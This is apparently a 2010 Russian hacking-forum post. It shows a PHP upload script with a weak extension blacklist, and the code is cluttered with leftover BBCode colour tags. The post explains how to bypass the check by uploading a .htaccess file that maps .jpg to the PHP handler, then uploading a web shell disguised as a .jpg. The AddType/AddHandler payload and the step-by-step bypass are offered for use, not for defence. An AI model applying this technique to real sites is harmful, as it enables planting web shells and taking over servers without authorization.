HTML шелл ?

#14

27.09.2010, 07:37

Expl0ited

Познавший АНТИЧАТ

Регистрация: 16.07.2010

Сообщений: 1,022

С нами: 8328566

Репутация: 935

Если заливаемому файлу программно не меняется имя файла, а просто например идет проверка на расширение, на подобии

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][COLOR="#007700"]HTML;

}

else {

[/COLOR][COLOR="#0000BB"]$allowed_files[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'php'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// или любое(ые) запрещаемое(ые) расширение(ия)

[/COLOR][COLOR="#0000BB"]$tfile[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]end[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] ) ); 

[/COLOR][COLOR="#0000BB"]$tfile[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tfile[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$check[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tfile[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]$allowed_files[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]; 

    if(![/COLOR][COLOR="#0000BB"]$check[/COLOR][COLOR="#007700"]) die([/COLOR][COLOR="#DD0000"]'hack detected'[/COLOR][COLOR="#007700"]); else {

        if([/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DOCUMENT_ROOT'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]))

        echo([/COLOR][COLOR="#DD0000"]'File upload: here'[/COLOR][COLOR="#007700"]);

    }

}

[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]

То можно это легко использовать, если залить файл .htaccess с содержанием например:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]AddType application[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]httpd[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]jpg

AddHandler application[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]httpd[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]jpg[/COLOR][/COLOR]

и затем спокойно лить шелл с расширением .jpg